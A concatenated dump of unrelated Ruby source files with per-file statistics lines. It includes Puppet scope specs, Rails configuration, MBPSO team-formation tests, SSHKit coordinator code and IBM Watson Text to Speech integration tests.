expect { @scope[:foo] }.to raise_error(Puppet::ParseError, /Scope variable name .* not a string/)
expect { @scope[:foo] = 12 }.to raise_error(Puppet::ParseError, /Scope variable name .* not a string/)
end
it "should return nil for unset variables when --strict variables is not in effect" do
expect(@scope["var"]).to be_nil
end
it "answers exist? with boolean false for non existing variables" do
expect(@scope.exist?("var")).to be(false)
end
it "answers exist? with boolean false for non existing variables" do
@scope["var"] = "yep"
expect(@scope.exist?("var")).to be(true)
end
it "should be able to look up values" do
@scope["var"] = "yep"
expect(@scope["var"]).to eq("yep")
end
it "should be able to look up hashes" do
@scope["var"] = {"a" => "b"}
expect(@scope["var"]).to eq({"a" => "b"})
end
it "should be able to look up variables in parent scopes" do
@topscope["var"] = "parentval"
expect(@scope["var"]).to eq("parentval")
end
it "should prefer its own values to parent values" do
@topscope["var"] = "parentval"
@scope["var"] = "childval"
expect(@scope["var"]).to eq("childval")
end
it "should be able to detect when variables are set" do
@scope["var"] = "childval"
expect(@scope).to be_include("var")
end
it "does not allow changing a set value" do
@scope["var"] = "childval"
expect {
@scope["var"] = "change"
}.to raise_error(Puppet::Error, "Cannot reassign variable '$var'")
end
it "should be able to detect when variables are not set" do
expect(@scope).not_to be_include("var")
end
it "warns and return nil for non found unqualified variable" do
Puppet.expects(:warn_once)
expect(@scope["santa_clause"]).to be_nil
end
it "warns once for a non found variable" do
Puppet.expects(:warning).once
expect([@scope["santa_claus"],@scope["santa_claus"]]).to eq([nil, nil])
end
it "warns and return nil for non found qualified variable" do
Puppet.expects(:warn_once)
expect(@scope["north_pole::santa_clause"]).to be_nil
end
it "does not warn when a numeric variable is missing - they always exist" do
Puppet.expects(:warn_once).never
expect(@scope["1"]).to be_nil
end
describe "and the variable is qualified" do
before :each do
@known_resource_types = @scope.known_resource_types
node = Puppet::Node.new('localhost')
@compiler = Puppet::Parser::Compiler.new(node)
end
def newclass(name)
@known_resource_types.add Puppet::Resource::Type.new(:hostclass, name)
end
def create_class_scope(name)
klass = newclass(name)
catalog = Puppet::Resource::Catalog.new
catalog.add_resource(Puppet::Parser::Resource.new("stage", :main, :scope => Puppet::Parser::Scope.new(@compiler)))
Puppet::Parser::Resource.new("class", name, :scope => @scope, :source => mock('source'), :catalog => catalog).evaluate
@scope.class_scope(klass)
end
it "should be able to look up explicitly fully qualified variables from main" do
Puppet.expects(:deprecation_warning).never
other_scope = create_class_scope("")
other_scope["othervar"] = "otherval"
expect(@scope["::othervar"]).to eq("otherval")
end
it "should be able to look up explicitly fully qualified variables from other scopes" do
Puppet.expects(:deprecation_warning).never
other_scope = create_class_scope("other")
other_scope["var"] = "otherval"
expect(@scope["::other::var"]).to eq("otherval")
end
it "should be able to look up deeply qualified variables" do
Puppet.expects(:deprecation_warning).never
other_scope = create_class_scope("other::deep::klass")
other_scope["var"] = "otherval"
expect(@scope["other::deep::klass::var"]).to eq("otherval")
end
it "should return nil for qualified variables that cannot be found in other classes" do
other_scope = create_class_scope("other::deep::klass")
expect(@scope["other::deep::klass::var"]).to be_nil
end
it "should warn and return nil for qualified variables whose classes have not been evaluated" do
klass = newclass("other::deep::klass")
Puppet.expects(:warn_once)
expect(@scope["other::deep::klass::var"]).to be_nil
end
it "should warn and return nil for qualified variables whose classes do not exist" do
Puppet.expects(:warn_once)
expect(@scope["other::deep::klass::var"]).to be_nil
end
it "should return nil when asked for a non-string qualified variable from a class that does not exist" do
expect(@scope["other::deep::klass::var"]).to be_nil
end
it "should return nil when asked for a non-string qualified variable from a class that has not been evaluated" do
@scope.stubs(:warning)
klass = newclass("other::deep::klass")
expect(@scope["other::deep::klass::var"]).to be_nil
end
end
context "and strict_variables is true" do
before(:each) do
Puppet[:strict_variables] = true
end
it "should throw a symbol when unknown variable is looked up" do
expect { @scope['john_doe'] }.to throw_symbol(:undefined_variable)
end
it "should throw a symbol when unknown qualified variable is looked up" do
expect { @scope['nowhere::john_doe'] }.to throw_symbol(:undefined_variable)
end
it "should not raise an error when built in variable is looked up" do
expect { @scope['caller_module_name'] }.to_not raise_error
expect { @scope['module_name'] }.to_not raise_error
end
end
context "and strict_variables is false and --strict=off" do
before(:each) do
Puppet[:strict_variables] = false
Puppet[:strict] = :off
end
it "should not error when unknown variable is looked up and produce nil" do
expect(@scope['john_doe']).to be_nil
end
it "should not error when unknown qualified variable is looked up and produce nil" do
expect(@scope['nowhere::john_doe']).to be_nil
end
end
context "and strict_variables is false and --strict=warning" do
before(:each) do
Puppet[:strict_variables] = false
Puppet[:strict] = :warning
end
it "should not error when unknown variable is looked up" do
expect(@scope['john_doe']).to be_nil
end
it "should not error when unknown qualified variable is looked up" do
expect(@scope['nowhere::john_doe']).to be_nil
end
end
context "and strict_variables is false and --strict=error" do
before(:each) do
Puppet[:strict_variables] = false
Puppet[:strict] = :error
end
it "should raise error when unknown variable is looked up" do
expect { @scope['john_doe'] }.to raise_error(/Undefined variable/)
end
it "should not throw a symbol when unknown qualified variable is looked up" do
expect { @scope['nowhere::john_doe'] }.to raise_error(/Undefined variable/)
end
end
end
describe "when variables are set with append=true" do
it "should raise error if the variable is already defined in this scope" do
@scope.setvar("var", "1", :append => false)
expect {
@scope.setvar("var", "1", :append => true)
}.to raise_error(
Puppet::ParseError,
"Cannot append, variable '$var' is defined in this scope"
)
end
it "should lookup current variable value" do
@scope.expects(:[]).with("var").returns("2")
@scope.setvar("var", "1", :append => true)
end
it "should store the concatenated string '42'" do
@topscope.setvar("var", "4", :append => false)
@scope.setvar("var", "2", :append => true)
expect(@scope["var"]).to eq("42")
end
it "should store the concatenated array [4,2]" do
@topscope.setvar("var", [4], :append => false)
@scope.setvar("var", [2], :append => true)
expect(@scope["var"]).to eq([4,2])
end
it "should store the merged hash {a => b, c => d}" do
@topscope.setvar("var", {"a" => "b"}, :append => false)
@scope.setvar("var", {"c" => "d"}, :append => true)
expect(@scope["var"]).to eq({"a" => "b", "c" => "d"})
end
it "should raise an error when appending a hash with something other than another hash" do
@topscope.setvar("var", {"a" => "b"}, :append => false)
expect {
@scope.setvar("var", "not a hash", :append => true)
}.to raise_error(
ArgumentError,
"Trying to append to a hash with something which is not a hash is unsupported"
)
end
end
describe "when calling number?" do
it "should return nil if called with anything not a number" do
expect(Puppet::Parser::Scope.number?([2])).to be_nil
end
it "should return a Fixnum for a Fixnum" do
expect(Puppet::Parser::Scope.number?(2)).to be_an_instance_of(Fixnum)
end
it "should return a Float for a Float" do
expect(Puppet::Parser::Scope.number?(2.34)).to be_an_instance_of(Float)
end
it "should return 234 for '234'" do
expect(Puppet::Parser::Scope.number?("234")).to eq(234)
end
it "should return nil for 'not a number'" do
expect(Puppet::Parser::Scope.number?("not a number")).to be_nil
end
it "should return 23.4 for '23.4'" do
expect(Puppet::Parser::Scope.number?("23.4")).to eq(23.4)
end
it "should return 23.4e13 for '23.4e13'" do
expect(Puppet::Parser::Scope.number?("23.4e13")).to eq(23.4e13)
end
it "should understand negative numbers" do
expect(Puppet::Parser::Scope.number?("-234")).to eq(-234)
end
it "should know how to convert exponential float numbers ala '23e13'" do
expect(Puppet::Parser::Scope.number?("23e13")).to eq(23e13)
end
it "should understand hexadecimal numbers" do
expect(Puppet::Parser::Scope.number?("0x234")).to eq(0x234)
end
it "should understand octal numbers" do
expect(Puppet::Parser::Scope.number?("0755")).to eq(0755)
end
it "should return nil on malformed integers" do
expect(Puppet::Parser::Scope.number?("0.24.5")).to be_nil
end
it "should convert strings with leading 0 to integer if they are not octal" do
expect(Puppet::Parser::Scope.number?("0788")).to eq(788)
end
it "should convert strings of negative integers" do
expect(Puppet::Parser::Scope.number?("-0788")).to eq(-788)
end
it "should return nil on malformed hexadecimal numbers" do
expect(Puppet::Parser::Scope.number?("0x89g")).to be_nil
end
end
describe "when using ephemeral variables" do
it "should store the variable value" do
# @scope.setvar("1", :value, :ephemeral => true)
@scope.set_match_data({1 => :value})
expect(@scope["1"]).to eq(:value)
end
it "should remove the variable value when unset_ephemeral_var(:all) is called" do
# @scope.setvar("1", :value, :ephemeral => true)
@scope.set_match_data({1 => :value})
@scope.stubs(:parent).returns(nil)
@scope.unset_ephemeral_var(:all)
expect(@scope["1"]).to be_nil
end
it "should not remove classic variables when unset_ephemeral_var(:all) is called" do
@scope['myvar'] = :value1
@scope.set_match_data({1 => :value2})
@scope.stubs(:parent).returns(nil)
@scope.unset_ephemeral_var(:all)
expect(@scope["myvar"]).to eq(:value1)
end
it "should raise an error when setting numerical variable" do
expect {
@scope.setvar("1", :value3, :ephemeral => true)
}.to raise_error(Puppet::ParseError, /Cannot assign to a numeric match result variable/)
end
describe "with more than one level" do
it "should prefer latest ephemeral scopes" do
@scope.set_match_data({0 => :earliest})
@scope.new_ephemeral
@scope.set_match_data({0 => :latest})
expect(@scope["0"]).to eq(:latest)
end
it "should be able to report the current level" do
expect(@scope.ephemeral_level).to eq(1)
@scope.new_ephemeral
expect(@scope.ephemeral_level).to eq(2)
end
it "should not check presence of an ephemeral variable across multiple levels" do
# This test was testing that scope actuallys screwed up - making values from earlier matches show as if they
# where true for latest match - insanity !
@scope.new_ephemeral
@scope.set_match_data({1 => :value1})
@scope.new_ephemeral
@scope.set_match_data({0 => :value2})
@scope.new_ephemeral
expect(@scope.include?("1")).to be_falsey
end
it "should return false when an ephemeral variable doesn't exist in any ephemeral scope" do
@scope.new_ephemeral
@scope.set_match_data({1 => :value1})
@scope.new_ephemeral
@scope.set_match_data({0 => :value2})
@scope.new_ephemeral
expect(@scope.include?("2")).to be_falsey
end
it "should not get ephemeral values from earlier scope when not in later" do
@scope.set_match_data({1 => :value1})
@scope.new_ephemeral
@scope.set_match_data({0 => :value2})
expect(@scope.include?("1")).to be_falsey
end
describe "when using a guarded scope" do
it "should remove ephemeral scopes up to this level" do
@scope.set_match_data({1 => :value1})
@scope.new_ephemeral
@scope.set_match_data({1 => :value2})
@scope.with_guarded_scope do
@scope.new_ephemeral
@scope.set_match_data({1 => :value3})
end
expect(@scope["1"]).to eq(:value2)
end
end
end
end
context "when using ephemeral as local scope" do
it "should store all variables in local scope" do
@scope.new_ephemeral true
@scope.setvar("apple", :fruit)
expect(@scope["apple"]).to eq(:fruit)
end
it "should remove all local scope variables on unset" do
@scope.new_ephemeral true
@scope.setvar("apple", :fruit)
expect(@scope["apple"]).to eq(:fruit)
@scope.unset_ephemeral_var
expect(@scope["apple"]).to eq(nil)
end
it "should be created from a hash" do
@scope.ephemeral_from({ "apple" => :fruit, "strawberry" => :berry})
expect(@scope["apple"]).to eq(:fruit)
expect(@scope["strawberry"]).to eq(:berry)
end
end
describe "when setting ephemeral vars from matches" do
before :each do
@match = stub 'match', :is_a? => true
@match.stubs(:[]).with(0).returns("this is a string")
@match.stubs(:captures).returns([])
@scope.stubs(:setvar)
end
it "should accept only MatchData" do
expect {
@scope.ephemeral_from("match")
}.to raise_error(ArgumentError, /Invalid regex match data/)
end
it "should set $0 with the full match" do
# This is an internal impl detail test
@scope.expects(:new_match_scope).with { |*arg| arg[0][0] == "this is a string" }
@scope.ephemeral_from(@match)
end
it "should set every capture as ephemeral var" do
# This is an internal impl detail test
@match.stubs(:[]).with(1).returns(:capture1)
@match.stubs(:[]).with(2).returns(:capture2)
@scope.expects(:new_match_scope).with { |*arg| arg[0][1] == :capture1 && arg[0][2] == :capture2 }
@scope.ephemeral_from(@match)
end
it "should shadow previous match variables" do
# This is an internal impl detail test
@match.stubs(:[]).with(1).returns(:capture1)
@match.stubs(:[]).with(2).returns(:capture2)
@match2 = stub 'match', :is_a? => true
@match2.stubs(:[]).with(1).returns(:capture2_1)
@match2.stubs(:[]).with(2).returns(nil)
@scope.ephemeral_from(@match)
@scope.ephemeral_from(@match2)
expect(@scope.lookupvar('2')).to eq(nil)
end
it "should create a new ephemeral level" do
level_before = @scope.ephemeral_level
@scope.ephemeral_from(@match)
expect(level_before < @scope.ephemeral_level)
end
end
describe "when managing defaults" do
it "should be able to set and lookup defaults" do
param = Puppet::Parser::Resource::Param.new(:name => :myparam, :value => "myvalue", :source => stub("source"))
@scope.define_settings(:mytype, param)
expect(@scope.lookupdefaults(:mytype)).to eq({:myparam => param})
end
it "should fail if a default is already defined and a new default is being defined" do
param = Puppet::Parser::Resource::Param.new(:name => :myparam, :value => "myvalue", :source => stub("source"))
@scope.define_settings(:mytype, param)
expect {
@scope.define_settings(:mytype, param)
}.to raise_error(Puppet::ParseError, /Default already defined .* cannot redefine/)
end
it "should return multiple defaults at once" do
param1 = Puppet::Parser::Resource::Param.new(:name => :myparam, :value => "myvalue", :source => stub("source"))
@scope.define_settings(:mytype, param1)
param2 = Puppet::Parser::Resource::Param.new(:name => :other, :value => "myvalue", :source => stub("source"))
@scope.define_settings(:mytype, param2)
expect(@scope.lookupdefaults(:mytype)).to eq({:myparam => param1, :other => param2})
end
it "should look up defaults defined in parent scopes" do
param1 = Puppet::Parser::Resource::Param.new(:name => :myparam, :value => "myvalue", :source => stub("source"))
@scope.define_settings(:mytype, param1)
child_scope = @scope.newscope
param2 = Puppet::Parser::Resource::Param.new(:name => :other, :value => "myvalue", :source => stub("source"))
child_scope.define_settings(:mytype, param2)
expect(child_scope.lookupdefaults(:mytype)).to eq({:myparam => param1, :other => param2})
end
end
context "#true?" do
{ "a string" => true,
"true" => true,
"false" => true,
true => true,
"" => false,
:undef => false,
nil => false
}.each do |input, output|
it "should treat #{input.inspect} as #{output}" do
expect(Puppet::Parser::Scope.true?(input)).to eq(output)
end
end
end
context "when producing a hash of all variables (as used in templates)" do
it "should contain all defined variables in the scope" do
@scope.setvar("orange", :tangerine)
@scope.setvar("pear", :green)
expect(@scope.to_hash).to eq({'orange' => :tangerine, 'pear' => :green })
end
it "should contain variables in all local scopes (#21508)" do
@scope.new_ephemeral true
@scope.setvar("orange", :tangerine)
@scope.setvar("pear", :green)
@scope.new_ephemeral true
@scope.setvar("apple", :red)
expect(@scope.to_hash).to eq({'orange' => :tangerine, 'pear' => :green, 'apple' => :red })
end
it "should contain all defined variables in the scope and all local scopes" do
@scope.setvar("orange", :tangerine)
@scope.setvar("pear", :green)
@scope.new_ephemeral true
@scope.setvar("apple", :red)
expect(@scope.to_hash).to eq({'orange' => :tangerine, 'pear' => :green, 'apple' => :red })
end
it "should not contain varaibles in match scopes (non local emphemeral)" do
@scope.new_ephemeral true
@scope.setvar("orange", :tangerine)
@scope.setvar("pear", :green)
@scope.ephemeral_from(/(f)(o)(o)/.match('foo'))
expect(@scope.to_hash).to eq({'orange' => :tangerine, 'pear' => :green })
end
it "should delete values that are :undef in inner scope" do
@scope.new_ephemeral true
@scope.setvar("orange", :tangerine)
@scope.setvar("pear", :green)
@scope.new_ephemeral true
@scope.setvar("apple", :red)
@scope.setvar("orange", :undef)
expect(@scope.to_hash).to eq({'pear' => :green, 'apple' => :red })
end
end
end
| 35.49932 | 126 | 0.643531 |
18dc0c8e7ef077bcfa5281306a3b1d0bafcabb1d | 560 | # frozen_string_literal: true
require 'rake'
require 'complexity_importer'
namespace :complexity do
desc 'import complexity records from CSV file'
task :import, [:filename] => [:environment] do |_task, args|
Rails.logger = Logger.new(STDOUT)
if args[:filename].blank?
Rails.logger.error('No CSV file specified') if args[:filename].blank?
else
Rails.logger.info('Beginning import')
File.open args[:filename] do |f|
ComplexityImporter.import f
end
Rails.logger.info('Import complete')
end
end
end
| 23.333333 | 75 | 0.682143 |
ac62343a3a7f3b5537d2ce5187193cb3822ed627 | 3,802 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Attempt to read encrypted secrets from `config/secrets.yml.enc`.
# Requires an encryption key in `ENV["RAILS_MASTER_KEY"]` or
# `config/secrets.yml.key`.
config.read_encrypted_secrets = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "ror-my-restaurant-review_#{Rails.env}"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
end
| 41.326087 | 102 | 0.757233 |
ac5051617bd249ff89300c05d5df68f52b561917 | 231 | module ApiCaller
module Error
class CallerError < StandardError
end
class MissingService < CallerError
end
class MissingRoute < CallerError
end
class MissingRouteName < CallerError
end
end
end | 15.4 | 40 | 0.705628 |
ab49bbd11c0024a4649049f1620ef3e852992bdb | 7,991 | require_relative 'spec_helper'
require '../lib/MBPSO_Team_Formation/mbpso'
require 'csv'
RSpec.describe MBPSOTeamFormation::MBPSO do
def test1
CSV.parse(File.read('test1.csv'), headers: true)
end
def test2
CSV.parse(File.read('test2.csv'), headers: true)
end
def inst_small_table
row1 = CSV::Row.new(%w(id Gender Ethnicity Grade), [1, 0, -1, 1])
row2 = CSV::Row.new(%w(id Gender Ethnicity Grade), [2, 1, 0, 2])
row3 = CSV::Row.new(%w(id Gender Ethnicity Grade), [3, -1, 2, 3])
row4 = CSV::Row.new(%w(id Gender Ethnicity Grade), [4, 0, 3, 4])
row5 = CSV::Row.new(%w(id Gender Ethnicity Grade), [5, 1, 4, 5])
row6 = CSV::Row.new(%w(id Gender Ethnicity Grade), [6, -1, -1, 6])
row7 = CSV::Row.new(%w(id Gender Ethnicity Grade), [7, 0, 0, 7])
row8 = CSV::Row.new(%w(id Gender Ethnicity Grade), [8, 1, 1, 1])
row9 = CSV::Row.new(%w(id Gender Ethnicity Grade), [9, -1, 2, 3])
row10 = CSV::Row.new(%w(id Gender Ethnicity Grade), [10, 0, 3, 5])
CSV::Table.new([row1, row2, row3, row4, row5, row6, row7, row8, row9, row10], headers: %w(id Gender Ethnicity Grade))
end
def inst_small_table2
row1 = CSV::Row.new(%w(id Gender Ethnicity Grade), [1, 0, -1, 1])
row2 = CSV::Row.new(%w(id Gender Ethnicity Grade), [2, 1, 0, 2])
row3 = CSV::Row.new(%w(id Gender Ethnicity Grade), [3, -1, 2, 3])
row4 = CSV::Row.new(%w(id Gender Ethnicity Grade), [4, 0, 3, 4])
row5 = CSV::Row.new(%w(id Gender Ethnicity Grade), [5, 1, 4, 5])
row6 = CSV::Row.new(%w(id Gender Ethnicity Grade), [6, -1, -1, 6])
row7 = CSV::Row.new(%w(id Gender Ethnicity Grade), [7, 0, 0, 7])
row8 = CSV::Row.new(%w(id Gender Ethnicity Grade), [8, 1, 1, 1])
row9 = CSV::Row.new(%w(id Gender Ethnicity Grade), [9, -1, 2, 3])
CSV::Table.new([row1, row2, row3, row4, row5, row6, row7, row8, row9], headers: %w(id Gender Ethnicity Grade))
end
describe "Intialisation" do
it "Initialised successfully with a valid data set" do
expect(MBPSOTeamFormation::MBPSO.new(test1)).to be_a(MBPSOTeamFormation::MBPSO)
expect(MBPSOTeamFormation::MBPSO.new(test2)).to be_a(MBPSOTeamFormation::MBPSO)
end
it "Initialised successfully with different sets of optional paramteres" do
expect(MBPSOTeamFormation::MBPSO.new(test2, num_particles: 20, gender_weight: 5, \
ethnicity_weight: 3, initial_inertia: 4.0)).to be_a(MBPSOTeamFormation::MBPSO)
expect(MBPSOTeamFormation::MBPSO.new(test1, final_inertia: 0.1, control_param_personal: [0.99, 0.6, 0.1], \
control_param_local: [0.1, 0.1, 0.1], survival_number: 30)).to be_a(MBPSOTeamFormation::MBPSO)
expect(MBPSOTeamFormation::MBPSO.new(test2, skill_table: {0..19 => 1, 20..49 => 20, 50..59 => 30, 60..76 => 40, 77..84 => 5, 85..100 => 4}, \
forbidden_pairs: [[1, 2], [3, 4]])).to be_a(MBPSOTeamFormation::MBPSO)
end
it "Instantiates with full set of optional parameters" do
expect(MBPSOTeamFormation::MBPSO.new(test1, team_size: 4, max_iterations: 3000, num_particles: 20, \
gender_weight: 6, ethnicity_weight: 6, initial_inertia: 2.0, final_inertia: 0.1, \
control_param_personal: [0.3, 0.3, 0.3], control_param_local: [0.3, 0.3, 0.3], \
survival_number: 15, final_survival_number: 3, \
skill_table: {0..19 => 1, 20..49 => 20, 50..59 => 30, 60..76 => 40, 77..84 => 5, 85..100 => 4}, \
forbidden_pairs: [[1, 2], [3, 4]], tolerate_missing_values: false, init_num_particles: 2, \
output_stats: false, output_stats_name: 'data', neigh_change_interval: 100, inertia_change_interval: 20, \
sn_change_interval: 20, particles_to_move: 3, inertia_changes: 200, sn_changes: 200, convergence_iterations: 200)).to be_a(MBPSOTeamFormation::MBPSO)
end
it "Throws exceptions for invalid input" do
expect {
MBPSOTeamFormation::MBPSO.new(test1, final_inertia: 'x', control_param_personal: [0.99, 0.6, 0.1], \
control_param_local: [0.1, 0.1, 0.1], survival_number: 30) }.to raise_error(ArgumentError)
expect {
MBPSOTeamFormation::MBPSO.new(test2, num_particles: -3, gender_weight: 5, \
ethnicity_weight: 3, initial_inertia: 4.0) }.to raise_error(ArgumentError)
expect {
MBPSOTeamFormation::MBPSO.new(test2, skill_table: {0..12 => 1, 20..49 => 20, 50..59 => 30, 60..76 => 40, 77..84 => 5, 85..100 => 4}, \
forbidden_pairs: [[1, 2], [3, 4]]) }.to raise_error(ArgumentError)
end
end
describe "Running the algorithm" do
it "Return the result in the format of Array of Arrays" do
mbpso1 = MBPSOTeamFormation::MBPSO.new(test1, num_particles: 5, max_iterations: 10)
mbpso2 = MBPSOTeamFormation::MBPSO.new(test2, num_particles: 4, max_iterations: 12)
x = 5
expect(x).to eq(5)
mbpso1.run.each do |x|
expect(x).to be_a(Array)
end
mbpso2.run.each do |x|
expect(x).to be_a(Array)
end
end
it "Exports statistics data into a .csv file with the expected amount of rows and columns" do
mbpso1 = MBPSOTeamFormation::MBPSO.new(test1, num_particles: 15, max_iterations: 20, neigh_change_interval: 1, output_stats: true)
mbpso2 = MBPSOTeamFormation::MBPSO.new(test2, num_particles: 10, max_iterations: 30, neigh_change_interval: 1, output_stats: true)
mbpso1.run
data = CSV.parse(File.read(File.join("\data", 'stats.csv')), headers: false)
expect(data.length).to eq(17)
expect(data[2].length).to eq(20)
mbpso2.run
data = CSV.parse(File.read(File.join("\data", 'stats.csv')), headers: false)
expect(data.length).to eq(12)
expect(data[2].length).to eq(30)
end
it "Exports data only if requested" do
mbpso1 = MBPSOTeamFormation::MBPSO.new(test1, num_particles: 15, max_iterations: 20, neigh_change_interval: 1, output_stats_name: 'should_fail.csv')
mbpso2 = MBPSOTeamFormation::MBPSO.new(test2, num_particles: 20, max_iterations: 2, neigh_change_interval: 1, output_stats: true, output_stats_name: 'should_succeed.csv')
mbpso1.run
expect { CSV.parse(File.read(File.join("\data", 'should_fail.csv')), headers: false) }.to raise_error(Errno::ENOENT)
mbpso2.run
expect(CSV.parse(File.read(File.join("\data", 'should_succeed.csv')), headers: false)).to be_a(Array)
end
it "Successfully allocates students if number of students is not a multiple of the teams size" do
mbpso1 = MBPSOTeamFormation::MBPSO.new(inst_small_table, num_particles: 10, max_iterations: 5)
i = 0
mbpso1.run.each do |x|
i += 1 if x.size == 5
end
expect(i).to eq(2)
mbpso2 = MBPSOTeamFormation::MBPSO.new(inst_small_table2, num_particles: 12, max_iterations: 3)
i = 0
mbpso2.run.each do |x|
i += 1 if x.size == 5
end
expect(i).to eq(1)
end
it "Succesfully allocated students to teams of various sizes" do
mbpso1 = MBPSOTeamFormation::MBPSO.new(test1, team_size: 10, num_particles: 8, max_iterations: 10)
mbpso1.run.each do |x|
expect(x.size).to eq(10)
end
mbpso1 = MBPSOTeamFormation::MBPSO.new(test1, team_size: 20, num_particles: 8, max_iterations: 10)
mbpso1.run.each do |x|
expect(x.size).to eq(20)
end
end
end
end
| 51.224359 | 200 | 0.597672 |
086537f1ec2bc241be2ccf1a708471835892bc9b | 822 | module SSHKit
class Coordinator
attr_accessor :hosts
def initialize(raw_hosts)
@raw_hosts = Array(raw_hosts)
@hosts = @raw_hosts.any? ? resolve_hosts : []
end
def each(options={}, &block)
if hosts
options = default_options.merge(options)
case options[:in]
when :parallel then Runner::Parallel
when :sequence then Runner::Sequential
when :groups then Runner::Group
else
options[:in]
end.new(hosts, options, &block).execute
else
Runner::Null.new(hosts, options, &block).execute
end
end
private
def default_options
{ in: SSHKit.config.default_runner }
end
def resolve_hosts
@raw_hosts.collect { |rh| rh.is_a?(Host) ? rh : Host.new(rh) }.uniq
end
end
end
| 20.55 | 73 | 0.605839 |
d567bbe3af5c5359f78a7f68f66021da99450ad3 | 2,714 | # frozen_string_literal: true
require_relative("./../test_helper.rb")
require("minitest/hooks/test")
if !ENV["TEXT_TO_SPEECH_APIKEY"].nil? && !ENV["TEXT_TO_SPEECH_URL"].nil?
# Integration tests for the Text to Speech V1 Service
class TextToSpeechV1Test < Minitest::Test
include Minitest::Hooks
attr_accessor :service
def before_all
authenticator = IBMWatson::Authenticators::IamAuthenticator.new(
apikey: ENV["TEXT_TO_SPEECH_APIKEY"]
)
@service = IBMWatson::TextToSpeechV1.new(
url: ENV["TEXT_TO_SPEECH_URL"],
authenticator: authenticator
)
@service.add_default_headers(
headers: {
"X-Watson-Learning-Opt-Out" => "1",
"X-Watson-Test" => "1"
}
)
end
def test_voices
output = @service.list_voices.result
refute(output["voices"].nil?)
voice = @service.get_voice(voice: output["voices"][0]["name"])
refute(voice.nil?)
end
def test_speak
output = @service.synthesize(
text: "my voice is my passport",
accept: "audio/wav",
voice: "en-US_AllisonVoice"
).result
refute(output.nil?)
end
def test_pronunciation
output = @service.get_pronunciation(
text: "hello"
).result
refute(output["pronunciation"].nil?)
end
def test_customizations
service_response = @service.list_voice_models
refute(service_response.nil?)
end
def test_custom_words
skip "Skip to allow for concurrent travis jobs"
customization_id = @service.create_voice_model(
name: "test_integration_customization",
description: "customization for tests"
).result["customization_id"]
words = @service.list_words(customization_id: customization_id).result["words"]
assert(words.length.zero?)
@service.add_word(
customization_id: customization_id,
word: "ACLs",
translation: "ackles"
)
words = [{ "word" => "MACLs", "translation" => "mackles" }]
@service.add_words(
customization_id: customization_id,
words: words
)
@service.delete_word(
customization_id: customization_id,
word: "ACLs"
)
word = @service.get_word(
customization_id: customization_id,
word: "MACLs"
).result
assert(word["translation"] == "mackles")
@service.delete_voice_model(
customization_id: customization_id
)
end
end
else
class TextToSpeechV1Test < Minitest::Test
def test_missing_credentials_skip_integration
skip "Skip text to speech integration tests because credentials have not been provided"
end
end
end
| 28.87234 | 93 | 0.643331 |
792e79a77186f033f1e52e5a4e5eee7a80f69711 | 179 | # frozen_string_literal: true
require 'shreddies/version'
require 'shreddies/engine'
module Shreddies
class Error < StandardError; end
autoload :Json, 'shreddies/json'
end
| 16.272727 | 34 | 0.776536 |
1c932d5ae933a7dfb0f871c1d440b6cff9579354 | 424 | ## $:.unshift(File.dirname(__FILE__))
## minitest setup
require 'minitest/autorun'
## our own code
require 'pluto/tasks'
LogUtils::Logger.root.level = :debug
## some shortcuts
Log = LogDb::Model::Log
Prop = ConfDb::Model::Prop
Site = Pluto::Model::Site
Feed = Pluto::Model::Feed
Item = Pluto::Model::Item
Subscription = Pluto::Model::Subscription
Pluto.setup_in_memory_db
| 15.142857 | 41 | 0.648585 |
e88e4ad59822617263a939a53b6d440d7e174a39 | 126 | json.extract! cliente, :id, :documentos, :nome, :email, :created_at, :updated_at
json.url cliente_url(cliente, format: :json)
| 42 | 80 | 0.746032 |
abcbb67abf3df4f777a812c49f4225fa6b468193 | 1,420 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sdk-core'
require 'aws-sigv4'
require_relative 'aws-sdk-cloudwatchrum/types'
require_relative 'aws-sdk-cloudwatchrum/client_api'
